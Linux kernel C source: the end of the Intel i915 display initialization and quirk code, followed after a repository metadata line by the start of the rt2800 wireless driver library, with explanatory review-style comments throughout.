			dev_priv->display.enable_fbc = g4x_enable_fbc;
			dev_priv->display.disable_fbc = g4x_disable_fbc;
		} else if (IS_CRESTLINE(dev)) {
			dev_priv->display.fbc_enabled = i8xx_fbc_enabled;
			dev_priv->display.enable_fbc = i8xx_enable_fbc;
			dev_priv->display.disable_fbc = i8xx_disable_fbc;
		}
		/* 855GM needs testing */
	}
	/* Returns the core display clock speed */
	if (IS_I945G(dev) || (IS_G33(dev) && ! IS_PINEVIEW_M(dev)))
		dev_priv->display.get_display_clock_speed =
			i945_get_display_clock_speed;
	else if (IS_I915G(dev))
		dev_priv->display.get_display_clock_speed =
			i915_get_display_clock_speed;
	else if (IS_I945GM(dev) || IS_845G(dev) || IS_PINEVIEW_M(dev))
		dev_priv->display.get_display_clock_speed =
			i9xx_misc_get_display_clock_speed;
	else if (IS_I915GM(dev))
		dev_priv->display.get_display_clock_speed =
			i915gm_get_display_clock_speed;
	else if (IS_I865G(dev))
		dev_priv->display.get_display_clock_speed =
			i865_get_display_clock_speed;
	else if (IS_I85X(dev))
		dev_priv->display.get_display_clock_speed =
			i855_get_display_clock_speed;
	else /* 852, 830 */
		dev_priv->display.get_display_clock_speed =
			i830_get_display_clock_speed;
	/* For FIFO watermark updates */
	if (HAS_PCH_SPLIT(dev)) {
		/* PCH clock gating depends on the PCH, not the CPU gen. */
		if (HAS_PCH_IBX(dev))
			dev_priv->display.init_pch_clock_gating = ibx_init_clock_gating;
		else if (HAS_PCH_CPT(dev))
			dev_priv->display.init_pch_clock_gating = cpt_init_clock_gating;
		if (IS_GEN5(dev)) {
			/* update_wm stays NULL (CxSR off) without latency data. */
			if (I915_READ(MLTR_ILK) & ILK_SRLT_MASK)
				dev_priv->display.update_wm = ironlake_update_wm;
			else {
				DRM_DEBUG_KMS("Failed to get proper latency. "
					      "Disable CxSR\n");
				dev_priv->display.update_wm = NULL;
			}
			dev_priv->display.fdi_link_train = ironlake_fdi_link_train;
			dev_priv->display.init_clock_gating = ironlake_init_clock_gating;
		} else if (IS_GEN6(dev)) {
			if (SNB_READ_WM0_LATENCY()) {
				dev_priv->display.update_wm = sandybridge_update_wm;
			} else {
				DRM_DEBUG_KMS("Failed to read display plane latency. "
					      "Disable CxSR\n");
				dev_priv->display.update_wm = NULL;
			}
			dev_priv->display.fdi_link_train = gen6_fdi_link_train;
			dev_priv->display.init_clock_gating = gen6_init_clock_gating;
		} else if (IS_IVYBRIDGE(dev)) {
			/* FIXME: detect B0+ stepping and use auto training */
			dev_priv->display.fdi_link_train = ivb_manual_fdi_link_train;
			if (SNB_READ_WM0_LATENCY()) {
				dev_priv->display.update_wm = sandybridge_update_wm;
			} else {
				DRM_DEBUG_KMS("Failed to read display plane latency. "
					      "Disable CxSR\n");
				dev_priv->display.update_wm = NULL;
			}
			dev_priv->display.init_clock_gating = ivybridge_init_clock_gating;
		} else
			dev_priv->display.update_wm = NULL;
	} else if (IS_PINEVIEW(dev)) {
		/* Pineview CxSR needs a latency table match for this memory. */
		if (!intel_get_cxsr_latency(IS_PINEVIEW_G(dev),
					    dev_priv->is_ddr3,
					    dev_priv->fsb_freq,
					    dev_priv->mem_freq)) {
			DRM_INFO("failed to find known CxSR latency "
				 "(found ddr%s fsb freq %d, mem freq %d), "
				 "disabling CxSR\n",
				 (dev_priv->is_ddr3 == 1) ? "3": "2",
				 dev_priv->fsb_freq, dev_priv->mem_freq);
			/* Disable CxSR and never update its watermark again */
			pineview_disable_cxsr(dev);
			dev_priv->display.update_wm = NULL;
		} else
			dev_priv->display.update_wm = pineview_update_wm;
		dev_priv->display.init_clock_gating = gen3_init_clock_gating;
	} else if (IS_G4X(dev)) {
		dev_priv->display.update_wm = g4x_update_wm;
		dev_priv->display.init_clock_gating = g4x_init_clock_gating;
	} else if (IS_GEN4(dev)) {
		dev_priv->display.update_wm = i965_update_wm;
		if (IS_CRESTLINE(dev))
			dev_priv->display.init_clock_gating = crestline_init_clock_gating;
		else if (IS_BROADWATER(dev))
			dev_priv->display.init_clock_gating = broadwater_init_clock_gating;
	} else if (IS_GEN3(dev)) {
		dev_priv->display.update_wm = i9xx_update_wm;
		dev_priv->display.get_fifo_size = i9xx_get_fifo_size;
		dev_priv->display.init_clock_gating = gen3_init_clock_gating;
	} else if (IS_I865G(dev)) {
		dev_priv->display.update_wm = i830_update_wm;
		dev_priv->display.init_clock_gating = i85x_init_clock_gating;
		dev_priv->display.get_fifo_size = i830_get_fifo_size;
	} else if (IS_I85X(dev)) {
		dev_priv->display.update_wm = i9xx_update_wm;
		dev_priv->display.get_fifo_size = i85x_get_fifo_size;
		dev_priv->display.init_clock_gating = i85x_init_clock_gating;
	} else {
		dev_priv->display.update_wm = i830_update_wm;
		dev_priv->display.init_clock_gating = i830_init_clock_gating;
		if (IS_845G(dev))
			dev_priv->display.get_fifo_size = i845_get_fifo_size;
		else
			dev_priv->display.get_fifo_size = i830_get_fifo_size;
	}
	/* Default just returns -ENODEV to indicate unsupported */
	dev_priv->display.queue_flip = intel_default_queue_flip;
	switch (INTEL_INFO(dev)->gen) {
	case 2:
		dev_priv->display.queue_flip = intel_gen2_queue_flip;
		break;
	case 3:
		dev_priv->display.queue_flip = intel_gen3_queue_flip;
		break;
	case 4:
	case 5:
		dev_priv->display.queue_flip = intel_gen4_queue_flip;
		break;
	case 6:
		dev_priv->display.queue_flip = intel_gen6_queue_flip;
		break;
	case 7:
		dev_priv->display.queue_flip = intel_gen7_queue_flip;
		break;
	}
}
/*
* Some BIOSes insist on assuming the GPU's pipe A is enabled at suspend,
* resume, or other times. This quirk makes sure that's the case for
* affected systems.
*/
/*
 * quirk_pipea_force - quirk hook: keep pipe A forced on
 * @dev: drm device
 *
 * Sets QUIRK_PIPEA_FORCE in dev_priv->quirks.  (Also drops the
 * non-kernel-style space between the function name and parameter list.)
 */
static void quirk_pipea_force(struct drm_device *dev)
{
	struct drm_i915_private *dev_priv = dev->dev_private;
	dev_priv->quirks |= QUIRK_PIPEA_FORCE;
	DRM_DEBUG_DRIVER("applying pipe a force quirk\n");
}
/*
* Some machines (Lenovo U160) do not work with SSC on LVDS for some reason
*/
/*
 * quirk_ssc_force_disable - quirk hook: never use SSC on LVDS
 * @dev: drm device
 *
 * Sets QUIRK_LVDS_SSC_DISABLE in dev_priv->quirks.  Logs the quirk
 * application for consistency with the other quirk hooks so affected
 * machines can be identified from logs.
 */
static void quirk_ssc_force_disable(struct drm_device *dev)
{
	struct drm_i915_private *dev_priv = dev->dev_private;
	dev_priv->quirks |= QUIRK_LVDS_SSC_DISABLE;
	DRM_DEBUG_DRIVER("applying lvds SSC disable quirk\n");
}
/* One PCI-ID-matched workaround; see intel_quirks[] and intel_init_quirks(). */
struct intel_quirk {
	int device;		/* PCI device ID to match */
	int subsystem_vendor;	/* subsystem vendor ID, or PCI_ANY_ID */
	int subsystem_device;	/* subsystem device ID, or PCI_ANY_ID */
	void (*hook)(struct drm_device *dev);	/* applied on match */
};
/*
 * Table of machine-specific workarounds, matched against the PCI IDs in
 * intel_init_quirks().  (Fixes the missing space after the comma in the
 * HP Mini entry; NOTE(review): this table could probably be made static
 * const - confirm no other file references it before changing linkage.)
 */
struct intel_quirk intel_quirks[] = {
	/* HP Compaq 2730p needs pipe A force quirk (LP: #291555) */
	{ 0x2a42, 0x103c, 0x30eb, quirk_pipea_force },
	/* HP Mini needs pipe A force quirk (LP: #322104) */
	{ 0x27ae, 0x103c, 0x361a, quirk_pipea_force },
	/* Thinkpad R31 needs pipe A force quirk */
	{ 0x3577, 0x1014, 0x0505, quirk_pipea_force },
	/* Toshiba Protege R-205, S-209 needs pipe A force quirk */
	{ 0x2592, 0x1179, 0x0001, quirk_pipea_force },
	/* ThinkPad X30 needs pipe A force quirk (LP: #304614) */
	{ 0x3577, 0x1014, 0x0513, quirk_pipea_force },
	/* ThinkPad X40 needs pipe A force quirk */
	/* ThinkPad T60 needs pipe A force quirk (bug #16494) */
	{ 0x2782, 0x17aa, 0x201a, quirk_pipea_force },
	/* 855 & before need to leave pipe A & dpll A up */
	{ 0x3582, PCI_ANY_ID, PCI_ANY_ID, quirk_pipea_force },
	{ 0x2562, PCI_ANY_ID, PCI_ANY_ID, quirk_pipea_force },
	/* Lenovo U160 cannot use SSC on LVDS */
	{ 0x0046, 0x17aa, 0x3920, quirk_ssc_force_disable },
	/* Sony Vaio Y cannot use SSC on LVDS */
	{ 0x0046, 0x104d, 0x9076, quirk_ssc_force_disable },
};
/*
 * intel_init_quirks - apply machine-specific workarounds
 * @dev: drm device
 *
 * Walks intel_quirks[] and invokes the hook of every entry whose PCI
 * device/subsystem IDs match this device; PCI_ANY_ID in a subsystem
 * field matches anything.
 */
static void intel_init_quirks(struct drm_device *dev)
{
	struct pci_dev *pdev = dev->pdev;
	int i;
	for (i = 0; i < ARRAY_SIZE(intel_quirks); i++) {
		struct intel_quirk *q = &intel_quirks[i];
		if (pdev->device != q->device)
			continue;
		if (q->subsystem_vendor != PCI_ANY_ID &&
		    q->subsystem_vendor != pdev->subsystem_vendor)
			continue;
		if (q->subsystem_device != PCI_ANY_ID &&
		    q->subsystem_device != pdev->subsystem_device)
			continue;
		q->hook(dev);
	}
}
/* Disable the VGA plane that we never use */
/*
 * i915_disable_vga - turn off the legacy VGA plane
 * @dev: drm device
 *
 * Sets the screen-off bit in VGA sequencer register SR01 (via the
 * legacy I/O ports, under the vgaarb lock) and then disables the VGA
 * display plane through the generation-specific control register.
 */
static void i915_disable_vga(struct drm_device *dev)
{
	struct drm_i915_private *dev_priv = dev->dev_private;
	u8 sr1;
	u32 vga_reg;
	if (HAS_PCH_SPLIT(dev))
		vga_reg = CPU_VGACNTRL;
	else
		vga_reg = VGACNTRL;
	/* Set SR01 bit 5 (screen off) through the index/data port pair. */
	vga_get_uninterruptible(dev->pdev, VGA_RSRC_LEGACY_IO);
	outb(1, VGA_SR_INDEX);
	sr1 = inb(VGA_SR_DATA);
	outb(sr1 | 1<<5, VGA_SR_DATA);
	vga_put(dev->pdev, VGA_RSRC_LEGACY_IO);
	udelay(300);
	I915_WRITE(vga_reg, VGA_DISP_DISABLE);
	POSTING_READ(vga_reg);
}
/*
 * intel_modeset_init - one-time modesetting initialization
 * @dev: drm device
 *
 * Sets up the KMS mode config (size limits by generation), applies
 * quirks, installs the display vtable, creates one CRTC per pipe,
 * disables the unused VGA plane, registers outputs, programs clock
 * gating and enables the power-management features (DRPS/EMON on
 * Ironlake-M, RPS on gen6/7).
 */
void intel_modeset_init(struct drm_device *dev)
{
	struct drm_i915_private *dev_priv = dev->dev_private;
	int i;
	drm_mode_config_init(dev);
	dev->mode_config.min_width = 0;
	dev->mode_config.min_height = 0;
	dev->mode_config.funcs = (void *)&intel_mode_funcs;
	intel_init_quirks(dev);
	intel_init_display(dev);
	/* Maximum framebuffer dimensions grow with the generation. */
	if (IS_GEN2(dev)) {
		dev->mode_config.max_width = 2048;
		dev->mode_config.max_height = 2048;
	} else if (IS_GEN3(dev)) {
		dev->mode_config.max_width = 4096;
		dev->mode_config.max_height = 4096;
	} else {
		dev->mode_config.max_width = 8192;
		dev->mode_config.max_height = 8192;
	}
	dev->mode_config.fb_base = dev->agp->base;
	DRM_DEBUG_KMS("%d display pipe%s available.\n",
		      dev_priv->num_pipe, dev_priv->num_pipe > 1 ? "s" : "");
	for (i = 0; i < dev_priv->num_pipe; i++) {
		intel_crtc_init(dev, i);
	}
	/* Just disable it once at startup */
	i915_disable_vga(dev);
	intel_setup_outputs(dev);
	intel_init_clock_gating(dev);
	if (IS_IRONLAKE_M(dev)) {
		ironlake_enable_drps(dev);
		intel_init_emon(dev);
	}
	if (IS_GEN6(dev) || IS_GEN7(dev)) {
		gen6_enable_rps(dev_priv);
		gen6_update_ring_freq(dev_priv);
	}
	/* Idle detection used to downclock when the GPU/display is idle. */
	INIT_WORK(&dev_priv->idle_work, intel_idle_update);
	setup_timer(&dev_priv->idle_timer, intel_gpu_idle_timer,
		    (unsigned long)dev);
}
/*
 * intel_modeset_gem_init - modeset init steps that need GEM up first
 * @dev: drm device
 *
 * RC6 needs GEM objects for its context pages and the overlay needs a
 * GEM-backed register page, so both are deferred until GEM init.
 */
void intel_modeset_gem_init(struct drm_device *dev)
{
	if (IS_IRONLAKE_M(dev))
		ironlake_enable_rc6(dev);
	intel_setup_overlay(dev);
}
/*
 * intel_modeset_cleanup - tear down everything intel_modeset_init set up
 * @dev: drm device
 *
 * Stops polling, restores PLL clocks on active CRTCs, disables FBC and
 * the power-management features, uninstalls the irq handler, flushes
 * pending work, kills the idle timers and finally releases the mode
 * config.  (Also drops a dead intel_crtc assignment from the first CRTC
 * loop; its value was never used there.)
 */
void intel_modeset_cleanup(struct drm_device *dev)
{
	struct drm_i915_private *dev_priv = dev->dev_private;
	struct drm_crtc *crtc;
	struct intel_crtc *intel_crtc;
	drm_kms_helper_poll_fini(dev);
	mutex_lock(&dev->struct_mutex);
	intel_unregister_dsm_handler();
	list_for_each_entry(crtc, &dev->mode_config.crtc_list, head) {
		/* Skip inactive CRTCs */
		if (!crtc->fb)
			continue;
		intel_increase_pllclock(crtc);
	}
	intel_disable_fbc(dev);
	if (IS_IRONLAKE_M(dev))
		ironlake_disable_drps(dev);
	if (IS_GEN6(dev) || IS_GEN7(dev))
		gen6_disable_rps(dev);
	if (IS_IRONLAKE_M(dev))
		ironlake_disable_rc6(dev);
	mutex_unlock(&dev->struct_mutex);
	/* Disable the irq before mode object teardown, for the irq might
	 * enqueue unpin/hotplug work. */
	drm_irq_uninstall(dev);
	cancel_work_sync(&dev_priv->hotplug_work);
	/* flush any delayed tasks or pending work */
	flush_scheduled_work();
	/* Shut off idle work before the crtcs get freed. */
	list_for_each_entry(crtc, &dev->mode_config.crtc_list, head) {
		intel_crtc = to_intel_crtc(crtc);
		del_timer_sync(&intel_crtc->idle_timer);
	}
	del_timer_sync(&dev_priv->idle_timer);
	cancel_work_sync(&dev_priv->idle_work);
	drm_mode_config_cleanup(dev);
}
/*
* Return which encoder is currently attached for connector.
*/
struct drm_encoder *intel_best_encoder(struct drm_connector *connector)
{
return &intel_attached_encoder(connector)->base;
}
/*
 * intel_connector_attach_encoder - bind an encoder to a connector
 * @connector: intel connector
 * @encoder: intel encoder to attach
 *
 * Records the encoder on the connector and registers the link with the
 * DRM core as well.
 */
void intel_connector_attach_encoder(struct intel_connector *connector,
				    struct intel_encoder *encoder)
{
	connector->encoder = encoder;
	drm_mode_connector_attach_encoder(&connector->base,
					  &encoder->base);
}
/*
* set vga decode state - true == enable VGA decode
*/
/*
 * intel_modeset_vga_set_state - toggle legacy VGA decode
 * @dev: drm device
 * @state: true to enable VGA decode, false to disable it
 *
 * Read-modify-writes the VGA-disable bit in the GMCH control word on
 * the bridge device.  Always returns 0.
 */
int intel_modeset_vga_set_state(struct drm_device *dev, bool state)
{
	struct drm_i915_private *dev_priv = dev->dev_private;
	u16 ctrl;
	pci_read_config_word(dev_priv->bridge_dev, INTEL_GMCH_CTRL, &ctrl);
	ctrl = state ? (ctrl & ~INTEL_GMCH_VGA_DISABLE)
		     : (ctrl | INTEL_GMCH_VGA_DISABLE);
	pci_write_config_word(dev_priv->bridge_dev, INTEL_GMCH_CTRL, ctrl);
	return 0;
}
#ifdef CONFIG_DEBUG_FS
#include <linux/seq_file.h>
/*
 * Snapshot of display register state taken at GPU error time; filled by
 * intel_display_capture_error_state() and dumped via debugfs by
 * intel_display_print_error_state().  Arrays are indexed by pipe/plane.
 */
struct intel_display_error_state {
	struct intel_cursor_error_state {
		u32 control;
		u32 position;
		u32 base;
		u32 size;	/* NOTE(review): never captured - see capture fn */
	} cursor[2];
	struct intel_pipe_error_state {
		u32 conf;
		u32 source;
		u32 htotal;
		u32 hblank;
		u32 hsync;
		u32 vtotal;
		u32 vblank;
		u32 vsync;
	} pipe[2];
	struct intel_plane_error_state {
		u32 control;
		u32 stride;
		u32 size;
		u32 pos;
		u32 addr;
		u32 surface;
		u32 tile_offset;
	} plane[2];
};
struct intel_display_error_state *
intel_display_capture_error_state(struct drm_device *dev)
{
drm_i915_private_t *dev_priv = dev->dev_private;
struct intel_display_error_state *error;
int i;
error = kmalloc(sizeof(*error), GFP_ATOMIC);
if (error == NULL)
return NULL;
for (i = 0; i < 2; i++) {
error->cursor[i].control = I915_READ(CURCNTR(i));
error->cursor[i].position = I915_READ(CURPOS(i));
error->cursor[i].base = I915_READ(CURBASE(i));
error->plane[i].control = I915_READ(DSPCNTR(i));
error->plane[i].stride = I915_READ(DSPSTRIDE(i));
error->plane[i].size = I915_READ(DSPSIZE(i));
error->plane[i].pos= I915_READ(DSPPOS(i));
error->plane[i].addr = I915_READ(DSPADDR(i));
if (INTEL_INFO(dev)->gen >= 4) {
error->plane[i].surface = I915_READ(DSPSURF(i));
error->plane[i].tile_offset = I915_READ(DSPTILEOFF(i));
}
error->pipe[i].conf = I915_READ(PIPECONF(i));
error->pipe[i].source = I915_READ(PIPESRC(i));
error->pipe[i].htotal = I915_READ(HTOTAL(i));
error->pipe[i].hblank = I915_READ(HBLANK(i));
error->pipe[i].hsync = I915_READ(HSYNC(i));
error->pipe[i].vtotal = I915_READ(VTOTAL(i));
error->pipe[i].vblank = I915_READ(VBLANK(i));
error->pipe[i].vsync = I915_READ(VSYNC(i));
}
return error;
}
/*
 * intel_display_print_error_state - dump a captured display snapshot
 * @m: seq_file to print into
 * @dev: drm device (used only to gate the gen4+ fields)
 * @error: snapshot from intel_display_capture_error_state()
 *
 * Pretty-prints the pipe, plane and cursor registers for both pipes.
 */
void
intel_display_print_error_state(struct seq_file *m,
				struct drm_device *dev,
				struct intel_display_error_state *error)
{
	int i;
	for (i = 0; i < 2; i++) {
		seq_printf(m, "Pipe [%d]:\n", i);
		seq_printf(m, "  CONF: %08x\n", error->pipe[i].conf);
		seq_printf(m, "  SRC: %08x\n", error->pipe[i].source);
		seq_printf(m, "  HTOTAL: %08x\n", error->pipe[i].htotal);
		seq_printf(m, "  HBLANK: %08x\n", error->pipe[i].hblank);
		seq_printf(m, "  HSYNC: %08x\n", error->pipe[i].hsync);
		seq_printf(m, "  VTOTAL: %08x\n", error->pipe[i].vtotal);
		seq_printf(m, "  VBLANK: %08x\n", error->pipe[i].vblank);
		seq_printf(m, "  VSYNC: %08x\n", error->pipe[i].vsync);
		seq_printf(m, "Plane [%d]:\n", i);
		seq_printf(m, "  CNTR: %08x\n", error->plane[i].control);
		seq_printf(m, "  STRIDE: %08x\n", error->plane[i].stride);
		seq_printf(m, "  SIZE: %08x\n", error->plane[i].size);
		seq_printf(m, "  POS: %08x\n", error->plane[i].pos);
		seq_printf(m, "  ADDR: %08x\n", error->plane[i].addr);
		/* Surface base and tile offset registers exist on gen4+ only. */
		if (INTEL_INFO(dev)->gen >= 4) {
			seq_printf(m, "  SURF: %08x\n", error->plane[i].surface);
			seq_printf(m, "  TILEOFF: %08x\n", error->plane[i].tile_offset);
		}
		seq_printf(m, "Cursor [%d]:\n", i);
		seq_printf(m, "  CNTR: %08x\n", error->cursor[i].control);
		seq_printf(m, "  POS: %08x\n", error->cursor[i].position);
		seq_printf(m, "  BASE: %08x\n", error->cursor[i].base);
	}
}
#endif
| gpl-2.0 |
spl0i7/linux-backports | drivers/net/wireless/rt2x00/rt2800lib.c | 3 | 251448 | /*
Copyright (C) 2010 Willow Garage <http://www.willowgarage.com>
Copyright (C) 2010 Ivo van Doorn <IvDoorn@gmail.com>
Copyright (C) 2009 Bartlomiej Zolnierkiewicz <bzolnier@gmail.com>
Copyright (C) 2009 Gertjan van Wingerde <gwingerde@gmail.com>
Based on the original rt2800pci.c and rt2800usb.c.
Copyright (C) 2009 Alban Browaeys <prahal@yahoo.com>
Copyright (C) 2009 Felix Fietkau <nbd@openwrt.org>
Copyright (C) 2009 Luis Correia <luis.f.correia@gmail.com>
Copyright (C) 2009 Mattias Nissler <mattias.nissler@gmx.de>
Copyright (C) 2009 Mark Asselstine <asselsm@gmail.com>
Copyright (C) 2009 Xose Vazquez Perez <xose.vazquez@gmail.com>
<http://rt2x00.serialmonkey.com>
This program is free software; you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation; either version 2 of the License, or
(at your option) any later version.
This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public License
along with this program; if not, see <http://www.gnu.org/licenses/>.
*/
/*
Module: rt2800lib
Abstract: rt2800 generic device routines.
*/
#include <linux/crc-ccitt.h>
#include <linux/kernel.h>
#include <linux/module.h>
#include <linux/slab.h>
#include "rt2x00.h"
#include "rt2800lib.h"
#include "rt2800.h"
/*
* Register access.
* All access to the CSR registers will go through the methods
* rt2800_register_read and rt2800_register_write.
* BBP and RF register require indirect register access,
* and use the CSR registers BBPCSR and RFCSR to achieve this.
* These indirect registers work with busy bits,
* and we will try maximal REGISTER_BUSY_COUNT times to access
* the register while taking a REGISTER_BUSY_DELAY us delay
 * between each attempt. When the busy bit is still set at that time,
* the access attempt is considered to have failed,
* and we will print an error.
* The _lock versions must be used if you already hold the csr_mutex
*/
/* Poll until the BBP indirect-access register is no longer busy. */
#define WAIT_FOR_BBP(__dev, __reg) \
	rt2800_regbusy_read((__dev), BBP_CSR_CFG, BBP_CSR_CFG_BUSY, (__reg))
/* Poll until the RFCSR indirect-access register is no longer busy. */
#define WAIT_FOR_RFCSR(__dev, __reg) \
	rt2800_regbusy_read((__dev), RF_CSR_CFG, RF_CSR_CFG_BUSY, (__reg))
/* Poll until the (legacy) RF register interface is no longer busy. */
#define WAIT_FOR_RF(__dev, __reg) \
	rt2800_regbusy_read((__dev), RF_CSR_CFG0, RF_CSR_CFG0_BUSY, (__reg))
/* Poll until the host-to-MCU mailbox is owned by the host again. */
#define WAIT_FOR_MCU(__dev, __reg) \
	rt2800_regbusy_read((__dev), H2M_MAILBOX_CSR, \
			    H2M_MAILBOX_CSR_OWNER, (__reg))
/*
 * rt2800_is_305x_soc - detect an rt305x SoC board
 * @rt2x00dev: rt2x00 device
 *
 * An rt305x board is an rt2872 on a SoC platform carrying one of the RF
 * chipsets known to ship on such boards.  Warns (and returns false) for
 * an rt2872 SoC with an unrecognized RF chipset.
 */
static inline bool rt2800_is_305x_soc(struct rt2x00_dev *rt2x00dev)
{
	/* Anything that isn't an rt2872 on a SoC cannot be an rt305x. */
	if (!rt2x00_is_soc(rt2x00dev))
		return false;
	if (!rt2x00_rt(rt2x00dev, RT2872))
		return false;
	/* These RF chipsets are known to be used on rt305x boards only. */
	if (rt2x00_rf(rt2x00dev, RF3020))
		return true;
	if (rt2x00_rf(rt2x00dev, RF3021))
		return true;
	if (rt2x00_rf(rt2x00dev, RF3022))
		return true;
	rt2x00_warn(rt2x00dev, "Unknown RF chipset on rt305x\n");
	return false;
}
/*
 * rt2800_bbp_write - write a BBP register via the indirect interface
 * @rt2x00dev: rt2x00 device
 * @word: BBP register number
 * @value: value to write
 *
 * Serialized by csr_mutex.  If the BBP never becomes available the
 * write is silently dropped (regbusy_read already logged the timeout).
 */
static void rt2800_bbp_write(struct rt2x00_dev *rt2x00dev,
			     const unsigned int word, const u8 value)
{
	u32 reg;
	mutex_lock(&rt2x00dev->csr_mutex);
	/*
	 * Wait until the BBP becomes available, afterwards we
	 * can safely write the new data into the register.
	 */
	if (WAIT_FOR_BBP(rt2x00dev, &reg)) {
		reg = 0;
		rt2x00_set_field32(&reg, BBP_CSR_CFG_VALUE, value);
		rt2x00_set_field32(&reg, BBP_CSR_CFG_REGNUM, word);
		rt2x00_set_field32(&reg, BBP_CSR_CFG_BUSY, 1);
		rt2x00_set_field32(&reg, BBP_CSR_CFG_READ_CONTROL, 0);
		rt2x00_set_field32(&reg, BBP_CSR_CFG_BBP_RW_MODE, 1);
		rt2800_register_write_lock(rt2x00dev, BBP_CSR_CFG, reg);
	}
	mutex_unlock(&rt2x00dev->csr_mutex);
}
/*
 * Read BBP register @word through the indirect BBP_CSR_CFG interface and
 * store the result in *@value. On timeout, reg is left as 0xffffffff by
 * the busy-read helper, so 0xff is returned to the caller.
 *
 * Fix: restore "&reg" which had been corrupted to the mojibake "®"
 * character, breaking compilation.
 */
static void rt2800_bbp_read(struct rt2x00_dev *rt2x00dev,
			    const unsigned int word, u8 *value)
{
	u32 reg;

	mutex_lock(&rt2x00dev->csr_mutex);

	/*
	 * Wait until the BBP becomes available, afterwards we
	 * can safely write the read request into the register.
	 * After the data has been written, we wait until hardware
	 * returns the correct value, if at any time the register
	 * doesn't become available in time, reg will be 0xffffffff
	 * which means we return 0xff to the caller.
	 */
	if (WAIT_FOR_BBP(rt2x00dev, &reg)) {
		reg = 0;
		rt2x00_set_field32(&reg, BBP_CSR_CFG_REGNUM, word);
		rt2x00_set_field32(&reg, BBP_CSR_CFG_BUSY, 1);
		rt2x00_set_field32(&reg, BBP_CSR_CFG_READ_CONTROL, 1);
		rt2x00_set_field32(&reg, BBP_CSR_CFG_BBP_RW_MODE, 1);

		rt2800_register_write_lock(rt2x00dev, BBP_CSR_CFG, reg);

		WAIT_FOR_BBP(rt2x00dev, &reg);
	}

	*value = rt2x00_get_field32(reg, BBP_CSR_CFG_VALUE);

	mutex_unlock(&rt2x00dev->csr_mutex);
}
/*
 * Write @value into RFCSR register @word through the indirect RF_CSR_CFG
 * interface. If the RFCSR never becomes ready the write is silently dropped.
 *
 * Fix: restore "&reg" which had been corrupted to the mojibake "®"
 * character, breaking compilation.
 */
static void rt2800_rfcsr_write(struct rt2x00_dev *rt2x00dev,
			       const unsigned int word, const u8 value)
{
	u32 reg;

	mutex_lock(&rt2x00dev->csr_mutex);

	/*
	 * Wait until the RFCSR becomes available, afterwards we
	 * can safely write the new data into the register.
	 */
	if (WAIT_FOR_RFCSR(rt2x00dev, &reg)) {
		reg = 0;
		rt2x00_set_field32(&reg, RF_CSR_CFG_DATA, value);
		rt2x00_set_field32(&reg, RF_CSR_CFG_REGNUM, word);
		rt2x00_set_field32(&reg, RF_CSR_CFG_WRITE, 1);
		rt2x00_set_field32(&reg, RF_CSR_CFG_BUSY, 1);

		rt2800_register_write_lock(rt2x00dev, RF_CSR_CFG, reg);
	}

	mutex_unlock(&rt2x00dev->csr_mutex);
}
/*
 * Read RFCSR register @word through the indirect RF_CSR_CFG interface and
 * store the result in *@value. On timeout, reg is left as 0xffffffff by
 * the busy-read helper, so 0xff is returned to the caller.
 *
 * Fix: restore "&reg" which had been corrupted to the mojibake "®"
 * character, breaking compilation.
 */
static void rt2800_rfcsr_read(struct rt2x00_dev *rt2x00dev,
			      const unsigned int word, u8 *value)
{
	u32 reg;

	mutex_lock(&rt2x00dev->csr_mutex);

	/*
	 * Wait until the RFCSR becomes available, afterwards we
	 * can safely write the read request into the register.
	 * After the data has been written, we wait until hardware
	 * returns the correct value, if at any time the register
	 * doesn't become available in time, reg will be 0xffffffff
	 * which means we return 0xff to the caller.
	 */
	if (WAIT_FOR_RFCSR(rt2x00dev, &reg)) {
		reg = 0;
		rt2x00_set_field32(&reg, RF_CSR_CFG_REGNUM, word);
		rt2x00_set_field32(&reg, RF_CSR_CFG_WRITE, 0);
		rt2x00_set_field32(&reg, RF_CSR_CFG_BUSY, 1);

		rt2800_register_write_lock(rt2x00dev, RF_CSR_CFG, reg);

		WAIT_FOR_RFCSR(rt2x00dev, &reg);
	}

	*value = rt2x00_get_field32(reg, RF_CSR_CFG_DATA);

	mutex_unlock(&rt2x00dev->csr_mutex);
}
/*
 * Write @value into RF register @word through the legacy RF_CSR_CFG0
 * serial interface, and mirror the value into the software RF register
 * cache via rt2x00_rf_write().
 *
 * Fix: restore "&reg" which had been corrupted to the mojibake "®"
 * character, breaking compilation.
 */
static void rt2800_rf_write(struct rt2x00_dev *rt2x00dev,
			    const unsigned int word, const u32 value)
{
	u32 reg;

	mutex_lock(&rt2x00dev->csr_mutex);

	/*
	 * Wait until the RF becomes available, afterwards we
	 * can safely write the new data into the register.
	 */
	if (WAIT_FOR_RF(rt2x00dev, &reg)) {
		reg = 0;
		rt2x00_set_field32(&reg, RF_CSR_CFG0_REG_VALUE_BW, value);
		rt2x00_set_field32(&reg, RF_CSR_CFG0_STANDBYMODE, 0);
		rt2x00_set_field32(&reg, RF_CSR_CFG0_SEL, 0);
		rt2x00_set_field32(&reg, RF_CSR_CFG0_BUSY, 1);

		rt2800_register_write_lock(rt2x00dev, RF_CSR_CFG0, reg);
		rt2x00_rf_write(rt2x00dev, word, value);
	}

	mutex_unlock(&rt2x00dev->csr_mutex);
}
/*
 * EEPROM word offsets for the standard rt2800 EEPROM layout.
 * Indexed by enum rt2800_eeprom_word; entries left at 0 (other than
 * EEPROM_CHIP_ID) mean the field does not exist in this layout — see
 * rt2800_eeprom_word_index().
 */
static const unsigned int rt2800_eeprom_map[EEPROM_WORD_COUNT] = {
	[EEPROM_CHIP_ID]		= 0x0000,
	[EEPROM_VERSION]		= 0x0001,
	[EEPROM_MAC_ADDR_0]		= 0x0002,
	[EEPROM_MAC_ADDR_1]		= 0x0003,
	[EEPROM_MAC_ADDR_2]		= 0x0004,
	[EEPROM_NIC_CONF0]		= 0x001a,
	[EEPROM_NIC_CONF1]		= 0x001b,
	[EEPROM_FREQ]			= 0x001d,
	[EEPROM_LED_AG_CONF]		= 0x001e,
	[EEPROM_LED_ACT_CONF]		= 0x001f,
	[EEPROM_LED_POLARITY]		= 0x0020,
	[EEPROM_NIC_CONF2]		= 0x0021,
	[EEPROM_LNA]			= 0x0022,
	[EEPROM_RSSI_BG]		= 0x0023,
	[EEPROM_RSSI_BG2]		= 0x0024,
	[EEPROM_TXMIXER_GAIN_BG]	= 0x0024, /* overlaps with RSSI_BG2 */
